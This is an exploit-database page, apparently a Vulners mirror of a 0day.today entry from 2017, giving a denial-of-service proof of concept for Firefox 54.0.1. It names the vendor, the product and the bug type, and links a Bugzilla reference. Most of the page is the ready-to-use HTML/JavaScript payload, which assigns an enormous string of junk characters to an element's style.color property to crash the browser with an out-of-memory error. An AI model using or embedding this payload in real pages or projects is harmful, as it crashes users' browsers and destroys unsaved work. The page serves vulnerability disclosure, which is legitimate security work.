Lucene search
+L

Firefox 54.0.1 - Denial of Service Exploit

🗓️ 07 Jul 2017 00:00:00Reported by hyp3rlinxType 
zdt
 zdt
🔗 0day.today👁 21 Views

Firefox 54.0.1 Denial of Service Exploit - Out of Memory Cras

Code
[+] Credits: John Page aka hyp3rlinx    
 
 
Vendor:
===============
www.mozilla.org
 
 
 
Product:
===============
Firefox v54.0.1
 
 
 
Vulnerability Type:
===================
Denial Of Service
 
 
 
Security Issue:
================
Dynamically creating HTML elements IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA and assigning very long string of junk chars to the
"style.color" property results in Firefox Browser out of memory crash (not tab crash).
 
Tested on Windows 7
 
References:
https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288
 
 
Exploit/POC:
=============
<html>
<body>
<script>
 
var p1 = "\x41";
for (var c=0;c<0xC350;c++){
p1+="\x41";
}
var p2="\x41";
for (c=0;c<0x1388;c++){
p2 += p1;
}        
var el = document.createElement('img')  //FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA  //<=== OR any of these elements.
el.style.color=p2
document.body.appendChild(el)
           
</script>
</body>
 
</html>

#  0day.today [2018-04-07]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2017 00:00Current
0.2Low risk
Vulners AI Score0.2
21